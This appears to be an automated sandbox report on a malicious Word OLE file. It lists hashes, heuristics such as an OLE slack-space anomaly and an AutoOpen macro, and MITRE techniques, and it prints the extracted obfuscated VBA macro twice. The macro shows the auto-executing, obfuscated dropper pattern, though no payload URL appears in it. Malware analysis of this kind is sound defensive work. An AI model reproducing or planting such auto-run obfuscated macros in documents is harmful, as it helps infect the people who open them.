Office (OLE) malware analysis — malicious · dcc4aeef83f611b1

MALICIOUS

Office (OLE)

73.3 KB First seen: 2019-03-18

MD5: d5138a4d6eefbaa28e6f4befb1533ab4 SHA-1: 3f3a91f46a2e48ebd55ea647c140af4bb54869b5 SHA-256: dcc4aeef83f611b1c6675863045f69b3f05cc562851afa7b1a57e4408914fe1e

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing VBA macros, specifically an AutoOpen macro designed to execute malicious code upon opening. The macro appears to be obfuscated, but its presence and the 'AutoOpen' trigger strongly suggest an attempt to download and execute a secondary payload. The OLE slack space anomaly further indicates potential data hiding or manipulation within the file structure.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 75,093 bytes but its declared streams total only 36,395 bytes — 38,698 bytes (52%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 862 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	862 bytes
SHA-256: `3655af682fd0bf0492e5f8989aee8fb5bf1c14a8d49f5f8ccbd778e41371741a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vvrPUYm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() If fQVuAo <= 1 Then TnzGaz = "GTXi" End If If FhuwfK <= 11 Then ELKjV = "ji" End If If XwmJht >= 15 Then KDDRZk = "RQcNdd" End If If WfGzL = cZhswQ Then rXzsnQ = "vCnfFd" End If MniJQWh (KeyString(AoPkf + WYpqKEEG + 8 + 8 + 51 + FPjOdBzr + PFlmQAXd) + UBNIJmT + FbOro + KeyString(dsXnQtYo + nCaJhb + 9 + 9 + 59 + XDBaE + mqCRANw) + HbbcVFTXnn + YPibOusk + FwucrdH + mnsPqtbR + aDrpGm + Ysvbct) If QwwiRH <= jsXTr Then rhZFCG = "HbjEUiUuUtSJ" End If If ofDsFS Xor KziSLv Then KWVamX = "pStJnnfLwFK" End If End Sub

SHA-256: 3655af682fd0bf0492e5f8989aee8fb5bf1c14a8d49f5f8ccbd778e41371741a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vvrPUYm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If fQVuAo <= 1 Then

TnzGaz = "GTXi"
End If
   If FhuwfK <= 11 Then

ELKjV = "ji"
End If
   If XwmJht >= 15 Then

KDDRZk = "RQcNdd"
End If
   If WfGzL = cZhswQ Then

rXzsnQ = "vCnfFd"
End If
MniJQWh (KeyString(AoPkf + WYpqKEEG + 8 + 8 + 51 + FPjOdBzr + PFlmQAXd) + UBNIJmT + FbOro + KeyString(dsXnQtYo + nCaJhb + 9 + 9 + 59 + XDBaE + mqCRANw) + HbbcVFTXnn + YPibOusk + FwucrdH + mnsPqtbR + aDrpGm + Ysvbct)
   If QwwiRH <= jsXTr Then

rhZFCG = "HbjEUiUuUtSJ"
End If
   If ofDsFS Xor KziSLv Then

KWVamX = "pStJnnfLwFK"
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.